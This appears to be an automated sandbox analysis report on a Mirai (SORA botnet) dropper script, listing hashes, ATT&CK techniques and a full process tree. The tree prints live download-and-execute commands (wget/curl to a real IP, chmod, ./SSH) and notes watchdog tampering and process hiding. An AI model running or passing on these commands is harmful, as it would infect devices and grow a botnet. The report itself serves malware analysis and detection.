mirai | 40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20-02-2025 09:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hilix.sh
Size

1KB
MD5

7196d305e319b48d1c38c317b091c7de
SHA1

cb78ce3f944836e9d577f9c560e2a8f517980119
SHA256

40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0
SHA512

a3532d690518b21ffd451a9be324f1484a7a5cc4f5b196b568b5f4b4bf5087aa6a68845555f280a56cbd29ce33db5a82579f2b489dbeb80d7e1615d4e11e9966

Score

10^/10

mirai sora antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (169693) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
716	chmod
766	chmod
786	chmod
807	chmod
671	chmod
700	chmod
733	chmod
795	chmod
818	chmod
681	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/SSH	672	Hilix.sh
/tmp/SSH	682	Hilix.sh
/tmp/SSH	701	Hilix.sh
/tmp/SSH	717	Hilix.sh
/tmp/SSH	735	Hilix.sh
/tmp/SSH	768	Hilix.sh
/tmp/SSH	787	Hilix.sh
/tmp/SSH	796	Hilix.sh
/tmp/SSH	808	Hilix.sh
/tmp/SSH	819	Hilix.sh

Modifies Watchdog functionality 1 TTPs 8 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	SSH
File opened for modification	/dev/watchdog	SSH
File opened for modification	/dev/watchdog	SSH
File opened for modification	/dev/watchdog	SSH
File opened for modification	/dev/misc/watchdog	SSH
File opened for modification	/dev/watchdog	SSH
File opened for modification	/dev/misc/watchdog	SSH
File opened for modification	/dev/misc/watchdog	SSH

Changes its process name 4 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	fm1d50o1kmoefm	787	SSH
Changes the process name, possibly in an attempt to hide itself	pcoa11ge1deje1	796	SSH
Changes the process name, possibly in an attempt to hide itself	a5fkmd3ia3pc2ikkgf	808	SSH
Changes the process name, possibly in an attempt to hide itself	n3bi5cch14bgc5mb	819	SSH

Checks CPU configuration 1 TTPs 10 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
676	wget
679	curl
680	cat

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Hilix.arm6	curl
File opened for modification	/tmp/Hilix.arm7	wget
File opened for modification	/tmp/Hilix.ppc	wget
File opened for modification	/tmp/Hilix.sh4	curl
File opened for modification	/tmp/Hilix.x86	curl
File opened for modification	/tmp/Hilix.mips	curl
File opened for modification	/tmp/Hilix.sh4	wget
File opened for modification	/tmp/Hilix.arm7	curl
File opened for modification	/tmp/Hilix.mips	wget
File opened for modification	/tmp/Hilix.mpsl	wget
File opened for modification	/tmp/Hilix.arm5	wget
File opened for modification	/tmp/Hilix.arm6	wget
File opened for modification	/tmp/Hilix.m68k	wget
File opened for modification	/tmp/SSH	Hilix.sh
File opened for modification	/tmp/Hilix.arm4	curl
File opened for modification	/tmp/Hilix.arm5	curl
File opened for modification	/tmp/Hilix.ppc	curl
File opened for modification	/tmp/Hilix.m68k	curl
File opened for modification	/tmp/Hilix.x86	wget
File opened for modification	/tmp/Hilix.mpsl	curl

/tmp/Hilix.sh
/tmp/Hilix.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:643
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.x86
  2⤵
  - Writes file to tmp directory
  PID:645
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:662
- /bin/cat
  cat Hilix.x86
  2⤵
  PID:669
- /bin/chmod
  chmod +x Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:671
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:672
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:676
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /bin/cat
  cat Hilix.mips
  2⤵
  - System Network Configuration Discovery
  PID:680
- /bin/chmod
  chmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:682
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.mpsl
  2⤵
  - Writes file to tmp directory
  PID:684
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:687
- /bin/cat
  cat Hilix.mpsl
  2⤵
  PID:698
- /bin/chmod
  chmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:701
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm4
  2⤵
  PID:705
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:708
- /bin/cat
  cat Hilix.arm4
  2⤵
  PID:715
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:716
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:717
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm5
  2⤵
  - Writes file to tmp directory
  PID:718
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:724
- /bin/cat
  cat Hilix.arm5
  2⤵
  PID:731
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:735
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm6
  2⤵
  - Writes file to tmp directory
  PID:736
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/cat
  cat Hilix.arm6
  2⤵
  PID:765
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  PID:768
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm7
  2⤵
  - Writes file to tmp directory
  PID:769
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:778
- /bin/cat
  cat Hilix.arm7
  2⤵
  PID:785
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:787
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.ppc
  2⤵
  - Writes file to tmp directory
  PID:790
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:793
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh Hilix.x86 SSH systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-4CFXlx
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:796
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.m68k
  2⤵
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh Hilix.x86 SSH
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:808
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.sh4
  2⤵
  - Writes file to tmp directory
  PID:811
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh Hilix.sh4 Hilix.x86 SSH
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/SSH
  ./SSH Hilix-SSH
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:819

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SSH

Filesize
48KB

MD5
11863d3338efb145179a0f97dce5b8c1

SHA1
f2e14c388fdab6b68d9632190f0cbf6965c955f5

SHA256
0621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f

SHA512
87e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08

Download Submit
/tmp/SSH

Filesize
71KB

MD5
200e03d27fc14205a10f0d5a030475d9

SHA1
188c13983b81ed439c8f0cc12039b465ba6616ca

SHA256
acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d

SHA512
af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89

Download Submit
/tmp/SSH

Filesize
71KB

MD5
a23bd973e7ff662a50be1d058902f06c

SHA1
d32254694bcf9a61494f3edd1e0d96dd8866af95

SHA256
6f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e

SHA512
5ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df

Download Submit
/tmp/SSH

Filesize
213B

MD5
f87005f796675cc42d01d2c2a0980019

SHA1
f86803abb6a20f74faa7d9a5cef4ad4ff35ed7cf

SHA256
3da99f8ed6b2499f723f7222634c922c77db0be580762fe1ef49a6933e5dfe7c

SHA512
2efd306ad26cdc3d521a203482ab104696fa681663e8268fd8b735e53daac7da3a37087bc3fae814c6e341c805e56aff9a0ebdc9c392546f0d23b916c07a8770

Download Submit
/tmp/SSH

Filesize
49KB

MD5
7dc9ff83da9241b391d19ab5e0c852a2

SHA1
990d4884a26640801b7c0798f8b370d90069e6c3

SHA256
e27622cb3fa56e1c36aeade1208b57dac065c386de4ebd1723802d373d300a22

SHA512
969f54dd3acc3ce702c2ee502044e590c7e8c55b7a9eae52965ef61cb627dbd71e1d083b7e298763a09a83985a2c58d20cf78dcc237586884cc92d613d2aee40

Download Submit
/tmp/SSH

Filesize
128KB

MD5
e4cfb853d49b335c295f07312a97a0c5

SHA1
c547b5df2c22728ce8321eb495597b4cc4920c24

SHA256
2d7685d750cb702de3a39d43429fd51b9391f3b70a1724901b464619cb53ea18

SHA512
207112452da6f16774817c89e5d47e473396559d03f2885f323fa23cf077d98c6bbbf6a79d3a15f467db8382c56535c3d9befb9386b6d1d7fdf0f3f76efecdae

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads